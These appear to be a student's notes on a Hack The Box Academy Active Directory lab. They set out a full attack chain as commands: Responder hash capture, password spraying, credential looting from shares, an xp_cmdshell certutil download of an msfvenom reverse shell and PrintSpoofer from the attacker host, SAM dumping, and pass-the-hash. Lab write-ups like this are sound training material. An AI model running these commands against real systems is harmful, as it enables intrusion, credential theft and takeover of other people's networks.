<aside> 🎯

We have A parrot machine into the Network and the Target here is searching for foothold and start Our Enums And attacks

</aside>

<aside> 🎯

after get into the network, i run responder -I ens224 to sniffing any foothold i found that a user called AB920 and get his hash and cracked it, so i have now a Domain Joined User Creds AB920:weasal

</aside>

<aside> 🎯

now trying to enum Users from credentials we found sudo crackmapexec smb 172.16.7.3 -u AB920 -p weasal --users

and got this svc_sccm , mssqlsvc and those are services accounts so let’s try kerbroasting

</aside>

<aside> 🎯

Checked Valid IPs β†’

β”Œβ”€[htb-student@skills-par01]─[~]
└──╼ $fping -asgq 172.16.7.3/23
172.16.7.3
172.16.7.50
172.16.7.60
172.16.7.240

Now login β†’

─[eu-academy-3]─[10.10.15.182]─[htb-ac-1729890@htb-q7fyafslq6]─[~]
└──╼ [β˜…]$ proxychains evil-winrm -i 172.16.7.50 -u AB920 -p weasal

</aside>

<aside> 🎯

Make Usernames List

sudo crackmapexec smb 172.16.7.3 -u 'ab920' -p 'weasal' --users | tee  usernames.txt
cat usernames.txt | cut -d'\' -f2 | awk -F " " '{print $1}' | tee valid_users.txt

Now trying to make Passwod Spray

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt Welcome1

image.png

[email protected]:Welcome1

</aside>

<aside> 🎯

Now we have to Search about Config Files , so let’s checking Shares File

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3

image.png

Checking Department Shares Share

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares'

image.png

Now let’s get this file smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' -A web.config

and found this Creds !

netdb:D@ta_bAse_adm1n!

</aside>

<aside> 🎯

login to this DB

mssqlclient.py inlanefreight/netdb:'D@ta_bAse_adm1n!'@172.16.7.60
SQL> EXEC xp_cmdshell 'whoami /priv'

image.png

then trying printnightmare CVE

#Generate the payload 
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1335 -f exe -o shell.exe
#transfer the shell and printservices
xp_cmdshell "certutil.exe -urlcache -f <http://172.16.7.240:8000/PrintSpoofer.exe> C:\Users\Public\PrintSpoofer.exe"
xp_cmdshell "certutil.exe -urlcache -f <http://172.16.7.240:8000/shell.exe> C:\Users\Public\shell.exe"
#prepare MSFCONSOLE Listener 

#run the payload 
xp_cmdshell C:\Users\Public\PrintSpoofer.exe -c C:\Users\Public\shell.exe

now we have meterpreter seesion so let’s Upgarde our privielges

metepreter> load kiwi
metepreter> lsa_dump_sam
#get administrator hash then we can access by winrm 
proxychains evil-winrm -i 172.16.7.60 -u administrator  -H bdaffbfe64f1fc646a3353be1c2c3c99

</aside>

<aside> 🎯

We can Enter using PSEXEC

use exploit/windows/smb/psexec
set lhost 172.16.7.240
set rhosts 172.16.7.50
set smbuser administrator
set smbpass 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99
exploit
Shell
powershell

Now we wanna to upload Sharphound to gather data so, let’s host this file in our attack machine then upload it

certutil -urlcache -f <http://172.16.7.240:8080/SharpHound.exe> SharpHound.exe

then get the Zip File after SharpHound Finishs


</aside>